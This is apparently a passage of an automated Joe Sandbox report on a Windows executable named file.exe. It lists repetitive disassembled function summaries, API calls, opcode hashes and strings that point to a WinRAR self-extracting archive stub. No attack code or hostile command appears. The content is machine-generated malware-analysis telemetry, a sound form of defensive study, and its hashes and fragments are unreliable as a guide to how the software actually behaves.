                                                                                            • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                                                                          • _free.LIBCMT ref: 00899294
                                                                                          • _free.LIBCMT ref: 008992A6
                                                                                          • _free.LIBCMT ref: 008992B8
                                                                                          • _free.LIBCMT ref: 008992CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 44de562e4e4aadcf9dd3f48387150d1572a2cf8f2cea583dcb1f8f3e8f3c020f
                                                                                          • Instruction ID: 08c260449b32b0b42735a750d2898955bbefd3f7b350bc5702553bd2fd4a37c9
                                                                                          • Opcode Fuzzy Hash: 44de562e4e4aadcf9dd3f48387150d1572a2cf8f2cea583dcb1f8f3e8f3c020f
                                                                                          • Instruction Fuzzy Hash: 61F03C32605604ABAE65FB9CF982D1A77E9FA0172075C4809F098D7D11C724FC80C651
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0089555D
                                                                                            • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                                                            • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                                                                          • _free.LIBCMT ref: 0089556F
                                                                                          • _free.LIBCMT ref: 00895582
                                                                                          • _free.LIBCMT ref: 00895593
                                                                                          • _free.LIBCMT ref: 008955A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 7d384e2f2384d470300674ac38f946affe87a414be42a97e7ef7b6501971e5ca
                                                                                          • Instruction ID: 45f85c300944d7ff5bf1b2a0c1e1cec7f3ce091ab0e1731bf96d1d9d2cf0b890
                                                                                          • Opcode Fuzzy Hash: 7d384e2f2384d470300674ac38f946affe87a414be42a97e7ef7b6501971e5ca
                                                                                          • Instruction Fuzzy Hash: 60F01DB4522A548F9F067F28FC029083BB4F70572034A011AF44492B65CB394801DB83
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00894C1A
                                                                                          • _free.LIBCMT ref: 00894CE5
                                                                                          • _free.LIBCMT ref: 00894CEF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\Desktop\file.exe
                                                                                          • API String ID: 2506810119-1957095476
                                                                                          • Opcode ID: ce97ff094a4e4850305bf3ce601fd27a0b672513174c77837be3407c014f9d40
                                                                                          • Instruction ID: 1316bae2919dd1a8ed6822006ce744df70d67ceca131a62fb7436de56269a1be
                                                                                          • Opcode Fuzzy Hash: ce97ff094a4e4850305bf3ce601fd27a0b672513174c77837be3407c014f9d40
                                                                                          • Instruction Fuzzy Hash: 5D316B71A01658AFDF21EBA99C81D9EBBFCFB85318F184066F805D7211D7718A41CB91
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00877468
                                                                                            • Part of subcall function 00873AA3: __EH_prolog.LIBCMT ref: 00873AA8
                                                                                          • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0087752E
                                                                                            • Part of subcall function 00877A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAC
                                                                                            • Part of subcall function 00877A9D: GetLastError.KERNEL32 ref: 00877AF2
                                                                                            • Part of subcall function 00877A9D: CloseHandle.KERNEL32(?), ref: 00877B01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                          • API String ID: 3813983858-639343689
                                                                                          • Opcode ID: de3bd48214856f01cc69d8d0c28624fe04fecb12a54b108eae5302fa519a0eec
                                                                                          • Instruction ID: c886b5b5edfd5635dfe4a7756ce7918239ce6928a9eea0b1fa6c85c2fa6eefde
                                                                                          • Opcode Fuzzy Hash: de3bd48214856f01cc69d8d0c28624fe04fecb12a54b108eae5302fa519a0eec
                                                                                          • Instruction Fuzzy Hash: 8831C171904208AAEF10EF68DC06BEEBB68FF46714F048025F94DE7696D7748A44CB62
                                                                                          APIs
                                                                                          • CharUpperW.USER32(?,?,?,?,00001000), ref: 0088A92C
                                                                                          • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0088A953
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharUpper
                                                                                          • String ID: -
                                                                                          • API String ID: 9403516-2547889144
                                                                                          • Opcode ID: 04f640e303532f4daceca3f90228278acbd4ab5cc46995da177394f98b557bb5
                                                                                          • Instruction ID: 63da17b40bd6cd73844a5a5dd45e54b571e971a0fdc19cac743faa1d84e3727f
                                                                                          • Opcode Fuzzy Hash: 04f640e303532f4daceca3f90228278acbd4ab5cc46995da177394f98b557bb5
                                                                                          • Instruction Fuzzy Hash: D721A26240C20959E229BA6C8C09B7BBE98F745324F02441BF5A8D29C7E674D898D363
                                                                                          APIs
                                                                                            • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                                                            • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                                                                          • EndDialog.USER32(?,00000001), ref: 008891AB
                                                                                          • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 008891C0
                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 008891D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: ASKNEXTVOL
                                                                                          • API String ID: 445417207-3402441367
                                                                                          • Opcode ID: 075f03abc915fa5c29127e901bf4eed15ecb57ff007231de2b218733bb9798c4
                                                                                          • Instruction ID: fa7d84ef8c74377f02ed25fe0533d432004a7577ab69cd0b5b0a2bb6ef095848
                                                                                          • Opcode Fuzzy Hash: 075f03abc915fa5c29127e901bf4eed15ecb57ff007231de2b218733bb9798c4
                                                                                          • Instruction Fuzzy Hash: BC110636248206BFE605AFA8DD4EF763BADFB4A705F044010F241D74A5C33A9C05D722
                                                                                          APIs
                                                                                            • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                                                            • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                                                                          • EndDialog.USER32(?,00000001), ref: 00889694
                                                                                          • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 008896AC
                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 008896DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: GETPASSWORD1
                                                                                          • API String ID: 445417207-3292211884
                                                                                          • Opcode ID: ec62be4988d6996649e20103727f7dfc07adc14a0951e9c7d63b1242be5e27b4
                                                                                          • Instruction ID: f21aa53f13c1cafb1ba8664b42502a1db2d6fee341fa42ad7da976551ff8f655
                                                                                          • Opcode Fuzzy Hash: ec62be4988d6996649e20103727f7dfc07adc14a0951e9c7d63b1242be5e27b4
                                                                                          • Instruction Fuzzy Hash: 9611E53250011876EF21EE689D49FFA376CFB1A740F140010FA89F2980D2A5AD04D7A1
                                                                                          APIs
                                                                                          • _swprintf.LIBCMT ref: 0087B127
                                                                                            • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                                                                          • _wcschr.LIBVCRUNTIME ref: 0087B145
                                                                                          • _wcschr.LIBVCRUNTIME ref: 0087B155
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                          • String ID: %c:\
                                                                                          • API String ID: 525462905-3142399695
                                                                                          • Opcode ID: e625230acce6b34e7feb84121c51df995bf3cd145d1ea2acbf6c17d15eae1770
                                                                                          • Instruction ID: 9b652876114d156d412e0e98140a0b23400fb82973b7cc2b6e4efcaf1d16b67c
                                                                                          • Opcode Fuzzy Hash: e625230acce6b34e7feb84121c51df995bf3cd145d1ea2acbf6c17d15eae1770
                                                                                          • Instruction Fuzzy Hash: 9E0192575043117ADA20AB699C86E6BB7ADFE963B0B94841BF84CC7085FB20D850C6B2
                                                                                          APIs
                                                                                          • InitializeCriticalSection.KERNEL32(000001A0,008B1E74,00000000,?,?,0087FB88,00000020,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?), ref: 0087F969
                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F973
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F983
                                                                                          Strings
                                                                                          • Thread pool initialization failed., xrefs: 0087F99B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                          • String ID: Thread pool initialization failed.
                                                                                          • API String ID: 3340455307-2182114853
                                                                                          • Opcode ID: b66eec3cab3690f0c35c35ede749aca9a7617b9365985cc80830f2701e84652f
                                                                                          • Instruction ID: bcbe2bacc31a76ddc3a0bd9002851fcd2c4b446e87d545d07a04e5ce430c4bab
                                                                                          • Opcode Fuzzy Hash: b66eec3cab3690f0c35c35ede749aca9a7617b9365985cc80830f2701e84652f
                                                                                          • Instruction Fuzzy Hash: DC111FB1500705AFD3305F669885BA7FBECFB56355F10482EE3DEC2241DA7168408B50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                          • API String ID: 0-56093855
                                                                                          • Opcode ID: 04bb5c5f2a63c7200a85aea85b97b4c6fe003a236978d65bc599e69fc92ea472
                                                                                          • Instruction ID: 5e4adede1720c3c4a6c1477ea31ff1682fbe57ca6dbe4fd6e1c67016173ecb2e
                                                                                          • Opcode Fuzzy Hash: 04bb5c5f2a63c7200a85aea85b97b4c6fe003a236978d65bc599e69fc92ea472
                                                                                          • Instruction Fuzzy Hash: 58018472609216AFD701EF68EC44E26BBE9F78A398F000536F651D2630D7329C05EF61
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0087CE57
                                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0087CE66
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindHandleModuleResource
                                                                                          • String ID: LTR$RTL
                                                                                          • API String ID: 3537982541-719208805
                                                                                          • Opcode ID: 6405c7e819a064482c2ba04f404366183f30a3a643f8be1609789f7070703e9a
                                                                                          • Instruction ID: d8f9382755c9a4f575d5211e554e464c2df447ce3430c61da2e9ec38d571f760
                                                                                          • Opcode Fuzzy Hash: 6405c7e819a064482c2ba04f404366183f30a3a643f8be1609789f7070703e9a
                                                                                          • Instruction Fuzzy Hash: 9EF0F62160471867E72466A59C0AF6B3BACF786700F04825DB605C71C0DAA1D90C8BA5
                                                                                          APIs
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0088BE20
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088BE5C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentVariable
                                                                                          • String ID: sfxcmd$sfxpar
                                                                                          • API String ID: 1431749950-3493335439
                                                                                          • Opcode ID: ec525bac1c374405847cd0024671dade2a0313cbebbcefcc97820b2d4b8715ea
                                                                                          • Instruction ID: 07f8c7a062b279241345a5447c89d4e5446ddd9b90e8809a655072a176480293
                                                                                          • Opcode Fuzzy Hash: ec525bac1c374405847cd0024671dade2a0313cbebbcefcc97820b2d4b8715ea
                                                                                          • Instruction Fuzzy Hash: D7F0A772801224AADB213F98DC0DAF67799FF09B51F004091FD88D6541DB649C40C7B1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: __alldvrm$_strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1036877536-0
                                                                                          • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                          • Instruction ID: b9601f001904493a699bec70159f1a00a02ab942eb20e3e247edd75c51d4f097
                                                                                          • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                          • Instruction Fuzzy Hash: 7FA15871900386AFDF22AF58C891BAEBBE5FF25314F1C42BDE485DB281E2389951C751
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00892794,00000000,00000000,00892FC2,?,00892FC2,?,00000001,00892794,F5E85006,00000001,00892FC2,00892FC2), ref: 00899440
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008994C9
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008994DB
                                                                                          • __freea.LIBCMT ref: 008994E4
                                                                                            • Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                          • String ID:
                                                                                          • API String ID: 2652629310-0
                                                                                          • Opcode ID: 1ee17690266e1958108a07dfeb8734813686d9bd78855c3161927944e3b6cff4
                                                                                          • Instruction ID: 0b3333260ec6e83dde3f40c0af64056b483fba4e9301a0262f5e67545a1aa0de
                                                                                          • Opcode Fuzzy Hash: 1ee17690266e1958108a07dfeb8734813686d9bd78855c3161927944e3b6cff4
                                                                                          • Instruction Fuzzy Hash: 13318E72A0020AABDF26AF68DC45EAE7BA5FB40720F19412CFC45D6190E735CD91CBA4
                                                                                          APIs
                                                                                          • LoadBitmapW.USER32(00000065), ref: 00889A86
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00889AA7
                                                                                          • DeleteObject.GDI32(00000000), ref: 00889ACF
                                                                                          • DeleteObject.GDI32(00000000), ref: 00889AEE
                                                                                            • Part of subcall function 00888BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00889AC8,00000066), ref: 00888BE1
                                                                                            • Part of subcall function 00888BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00889AC8,00000066), ref: 00888BF9
                                                                                            • Part of subcall function 00888BD0: LoadResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C0C
                                                                                            • Part of subcall function 00888BD0: LockResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C17
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                          • String ID:
                                                                                          • API String ID: 142272564-0
                                                                                          • Opcode ID: 780cf05b1b16a3673795748f32ff454116a84a92023f7db02cf0fd2a69b6ee1f
                                                                                          • Instruction ID: 7257a64beb11f06fb398efd4635870318de6adca9960ac846d0ac988b9314976
                                                                                          • Opcode Fuzzy Hash: 780cf05b1b16a3673795748f32ff454116a84a92023f7db02cf0fd2a69b6ee1f
                                                                                          • Instruction Fuzzy Hash: 2B01F73264022577D61177789D42EBFB6AEFF85B61F480011F940E7592DE618C0187A2
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 00891020
                                                                                            • Part of subcall function 00891658: ___AdjustPointer.LIBCMT ref: 008916A2
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00891037
                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00891049
                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 0089106D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                          • String ID:
                                                                                          • API String ID: 2633735394-0
